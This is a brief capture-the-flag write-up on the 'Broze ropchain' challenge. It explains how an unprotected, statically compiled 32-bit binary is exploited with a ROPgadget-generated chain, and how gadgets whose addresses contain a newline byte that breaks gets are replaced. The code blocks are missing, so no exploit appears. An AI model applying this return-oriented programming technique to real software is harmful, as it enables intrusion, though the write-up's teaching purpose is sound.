Broze ropchain is a simple pwn challenge with a 32 bit binary.

The first step is to check the protection of the binary with checksec util:

Copy to Clipboard

How we can see there isn’t any protection and then is easy to pwn. Moreover, the binary is statically compiled:

Copy to Clipboard

this means that is easy find the gadgets for our ropchain, in fact, running ROPgadget util, we can obtain directly a ropchain with –ropchain option:

Copy to Clipboard

here there is only a problem, some gadget, in address, has the byte value ‘0a’ that is interpreted as “new line” from gets function, then need to replace these gadgets with another valid without ‘0a’. The final result is the following exploit:

Copy to Clipboard

And finally run it:

Copy to Clipboard

Recent Tweets

For privacy reasons Twitter needs your permission to be loaded.
I Accept